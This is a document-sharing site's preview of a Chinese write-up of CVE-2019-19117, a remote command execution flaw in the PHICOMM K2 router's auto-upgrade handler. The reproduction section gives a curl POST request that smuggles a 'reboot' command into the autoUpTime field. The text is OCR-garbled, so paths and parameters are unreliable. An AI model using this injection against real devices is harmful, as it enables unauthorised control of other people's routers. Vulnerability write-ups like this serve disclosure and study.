(CVE-2019-19117)PHICOMM 远程代码执行.docx
《(CVE-2019-19117)PHICOMM 远程代码执行.docx》由会员分享,可在线阅读,更多相关《(CVE-2019-19117)PHICOMM 远程代码执行.docx(2页珍藏版)》请在三一办公上搜索。
1、(CVE-2019-19117) PHICoMM 远程代码执行一、漏洞简介通过修改HTTPPOSt请求中的内容,在根Shen上远程执行命令。二、漏洞影响PHIC0MM K2(PSG1218) V22.5.9.163三、复现过程受影响的源代码文件:usrliblualuciCOntroIIeiadminautoupgrade.lua受影响的函数:SaVe ()漏洞详情首先,在通过Web登录身份验证,会话劫持漏洞或弱凭据破解攻击以获取访问权 限后,向设备发送精心制作的数据包curl -i -s -k -v -XPOST -e ,http:/192.168.2.lcgi-binluci;stok=x
2、x xxxxxxxxx -b sysauth=4a2c4bdba5fbl273ce62759fd42dba42 -data-bin ary mode=l&autoUpTime=02%3A051reboot http:/192.168.2.1/cgi-bin/luci /;stok=xxadminxxxxx,在此http数据包中,我们将要执行“重新引导”的命令添加到数据包内容中。 Jj%qnq, i$(#WanCheCkmodaI). modal(show);$(N#autoUpTimeM)val($(#uptImehourN)val() : $(M#uptimeminM).val();SetT
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- CVE-2019-19117PHICOMM 远程代码执行 CVE 2019 19117 PHICOMM 远程 代码 执行
链接地址:https://www.31ppt.com/p-6068760.html